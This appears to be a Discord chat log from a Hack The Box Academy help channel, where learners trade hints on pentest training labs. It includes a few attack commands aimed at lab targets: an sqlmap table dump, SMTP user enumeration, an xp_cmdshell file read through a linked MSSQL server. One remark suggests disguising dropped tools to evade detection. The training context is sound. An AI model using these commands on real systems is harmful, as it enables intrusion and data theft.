"Same Origin Policy cannot prevent an attacker from changing the visibility of @goldenpeacock467's profile. Answer Format: Yes or No"

This isn't even a question, it's a statement. "Session Security" MODULE content is ok, but the questions or non-questions at the end of each SECTION, are lackluster at best.

so you answer yes or no, what's wrong with that?

Incorrect, the question is if the statement is correct - yes or no.

its a T/F question w. Y/N

If you don't like the platform just don't use it but please stop complaining about things which are absolutely fine.

spread security not hate my guy

i enjoyed that module

which module?

the session security one

probably your nmap command? -sn disables port scanning so nmap uses icmp to scan the hosts and it doesn't work with socks

oh im stupid it targets 1 ip not the entire subnet

because that would take years

So I'm in the digital forensics module and on the skills assessment portion. Is the entire skill assessment done through velociraptor? I dont see any tools we used in the rest of the moduel on the target machine

I collected the artifacts with velociraptor, the disk image and the windows.memory.VAD artifacts, but stuck from there

Can someone DM about the hard skill assessment for Abusing HTTP misconfigurations. Im on the last step but its not working

what you see is what you get

you're stuck with velociraptor

the only thing they covered in the module with velociraptor was how to collect certain artifacts.. Well thanks for the direction to head at least

everything you were taught about velociraptor is all you need to complete the assessment

tool-operation wise

so you just have to manually sift through the artifacts with notepad or something?

or am i missing something

you certainly can't parse stuff like the memory or the MFT with notepad

you'll just have to think of another way to get the information you need

Hey! Velociraptor is a great tool, I use it all the time when the customer is too broke for InsightIDR.

😄

Hey is it me or the modules lab is real slow ?

My pwnbox was really slow aswell yeah, switched to my vm.

I restarted VPN already, but takes like 1 second when I type sth

I'm not using pwnbox, connecting ot hte instnaces directly...

Hm, no that's fine.

okay question

this makes it seem like you already have access to the windows host.

why would i need to portforward if download the exe on the segmented host

mine are supwer slow as well

Read again, port forwarding is needed for the reverse shell to connect back not for the initial payload transfer.

ahhh so the pyload xfer would happen first, you get in then can portfwd to get access to the internal lan

that is segmented

Bingo!

that makes sense.

Imagine connecting to some DMZ webserver for instance, you would pivot into the internal LAN like this bc it has 2 different NICs for instance.

okay liek a jump server and such.

Never mind that that would be a terrible firewall config but yeah.

No a server who has a leg each in different networks / vlans whatever.

youd use the jump host etc or whatever to get into the internal lan. when i did wreath i used sshuttle and chisel alot lol

so it makes more sense how htb is explaining it

yeah, they are nice tools but ssh forwarding is really easy where applicable.

and showing the diagrams

Yes 🙂 have fun!

then you get tools like ligolo that just make it a LOT easier

i hear ligolo makes life great. i just need to learn it

ligolo is nice yeah but in a real pentest you would want to avoid dropping unnecessary binarys to disk.

So anything that is not 100% needed will not be deployed.

That is the sad and unfun truth on real red-team engagements.

true; but you'd also likely obviously obfuscate it as a "backup" or something of that kind

Hello frens.

i am a bit stuck on this module
https://academy.hackthebox.com/module/147/section/1320

it helps to explain what you've tried and where you're stuck

I know what you are saying but any scan engine will detect is straight away unless you have rewritten the code to make it fresh.

Can someone help me with the final step on HTTP Misconfigations Hard Skill assessment?

have you also looked at the provided hint for the question

• 0 Examine the target and find out the password of the user Will. Then, submit the password as the answer.

Sometimes, we will not have any initial credentials available, and as the last step, we will need to bruteforce the credentials to available services to get access. From other hosts on the network, our colleagues were able to identify the user "Kira", who in most cases had SSH access to other systems with the password "LoveYou1". We have already provided a prepared list of passwords in the "Resources" section for simplicity's purpose.

this is the hint

Now I have found Wills password, how do I proceed further

Sorry I was typing in another message

if you found Will's password : put that as the answer

Then, submit the password as the answer.

^

BROO

jesus @north bramble take a break, get some air. You're brain is washed. 😄

WTF I DID THIS LIKE 6 hours back
IT SAID FIND ROOT PW

nope; q clearly says Will

BRO I SWEAR 5 hours back it said find root from wills PW

always has

reading the question helps you answer the question

https://academy.hackthebox.com/module/147/section/1319 < you're thinking of the next section

SHIT I AM SO STUPID THEN

I put in Wills password and it didnt accept it. I went out and came back redid the whole thing

https://en.wikipedia.org/wiki/Cognitive_bias I recommend a read on this.

it's literally the next section that has you use Will to find "root"

LMFAOOO

I am soo stupid Sorry guys

it happens

but I suggest taking a short break before continuing

So sorry again to waste your time Ima read the other section and proceed

what does ls -ltr do?

https://explainshell.com/

@echo fractal or man ls

thank you

nah i wasn't saying it's bad, just that it's the only thing you have available in the skills assessment

I was just teasing 😛

Linux privilege escalation --> logrotate , how to force the rotation?

holy fuck

ligolo makes it very easy

just using it is way easier than sshuttle or chisel

https://academy.hackthebox.com/module/147/section/1319

on the next part. I just want to confirm if I am going right.
may I share what I have done so far?

if you have the unshadow file: you're doing it right

otherwise gotta find a way to transfer the files back to your system

1. found shadow and passwd file, copypasted it into my machine. simple ctrl c and v into nano editor

2. then unshadow

3, was running against rockyou, but read on forums to use mutated wordlist so using that now

Am I right?

Thanks frens

Okay cracked and got it thanks everyone

you can force it by writing to the log you found.

Now check out ligolo-ng, in case you're really just using ligolo.

oh

im using the -ng

i went straigh for ng

Good!

nvm...

ive dissapointed him

whats the sqlmap parameter to just search all databases? i know how to do the current database --current-db

but how could i figure out the other databases there

nvm got it lol

Hey guys I am new here

Well I am from India is anyone also from India?

Is this the discord for the the trivia night??

This isn't a gen chat, read and follow #welcome to access more of the server

Sorry to interrupt!

I think it's already over

Shoot that’s right it’s European time

Welp

It started like an hour and a half ago

So yeah

how can i narrow down this query in sqlmap to target a specific record to just get the name and cracked hash password for kimberly? sqlmap -u http://94.237.63.93:54245/case1.php?id=1 -D testdb -T users --sql-query "SELECT * FROM users WHERE name LIKE 'Kimberly Wright'" --dump

keep getting weird outputs. funny enough the --dump does give me the full table with kims cracked password but how can i tailor the command to just dump kim's name and cracked password

Is "name" the name of the Column?

Also: spoilers dude

I dont want to exclude content that's needed for the question

It should be the name of the column lol did I miss that 😅

¯_(ツ)_/¯

But tbh if your command here gets or is close to the answer it can be a spoiler

When it comes to documenting and reporting findings, can each finding (ex: LFI) be associated with multiple systems in the report, OR should there be one finding for each system affected by the finding?

Each system can have different implications for the finding

So there should be a single finding listed per affected system because the details of the finding can be different than the same finding for another affected system?

can somone give me a hint with the attack vector for the skill assesment for the "SQLMap" module

Attempt to find a way that a user would traditionally interact with the site, if it were a real site. Use a proxy to intercept some requests.

ive been doing that

ive tested 3 post requests

it depends, if the vulnerability is the same which means the recommendation will be the same, then I'd put it under the same finding

And just list the affected systems and how you found the vulnerability for each under the single finding?

^ it just depends

there's no strictly the right way, write it in the way that it makes sense and meaningful to the customer

Just be consistent

Hello, I am stuck on the following question in the SMTP module in the FOOTPRINTING module:
Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
my code is the following but I get several SUCC values and I tried them all in the answer section but it doesn't work, can you help me?

smtp-user-enum -m RCPT -U /usr/share/wordlists/metasploit/unix_users.txt 10.129.42.85 25

can somone give me a hint with the attack vector for the skill assesment for the "SQLMap" module ive looked for post requests with a proxy and cant find a vulnerable one for the life of me

Use the wordlist provided by the module in the resources

@cloud urchinI could not find there is no wordlist in the module

There definitely is

CTRL+F and type resources

@cloud urchinThank you, I didn't see it.

I found it by clicking every single link on the site with Burp until I found it

I found it

thank you

awesome

Anyone able to help me with this part of the Linux PTT of the passsword attacks module?

i feel as though i;ve followed all the steps in the example but i still cant get it to work.

from the Digital Forensics final skill assessment. The question: Determine the registry key used for persistence and enter it as your answer. . I have gotten the windows.kapefiles.target artifacts which has all the registry hives. But I have no clue what to do next since the target machine has no tools except Velociraptor. I am not sure how to use Velociraptor to go about finding this information. Any tips or guidance?

I just wanna know if im making a stupid mistake, is it asking me, once ive followed all the steps, to connect to //dc01/c$?

or another C drive? seems like a badly worded question to me

Hey

did you ever get a response to this?

can i dm a mod or htb staff please

Why do you need to dm them?

I have an issue with linking my htb account to discord

Then just dm a mod that's online

https://academy.hackthebox.com/module/116/section/1468#questionsDiv
Managed to gain access to sqlcmd
Now enabled xp_cmdshell but when trying to read the flag

EXEC('EXECUTE AS LOGIN = ''john''; EXEC xp_cmdshell ''type C:\Users\Administrator\Desktop\flag.txt''') AT [LOCAL.TEST.LINKED.SRV]
2> GO
Msg 229, Level 14, State 5, Server WIN-HARD\SQLEXPRESS, Procedure xp_cmdshell, Line 1
The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.```

Try as John as sa

If this is hard lab, you need to do EXECUTE() at()

There’s an example I believe of reading files remotely

It's in the sql section

Oh

Ohhhhhhhhh okay I thought this was the lab

It is the hard lab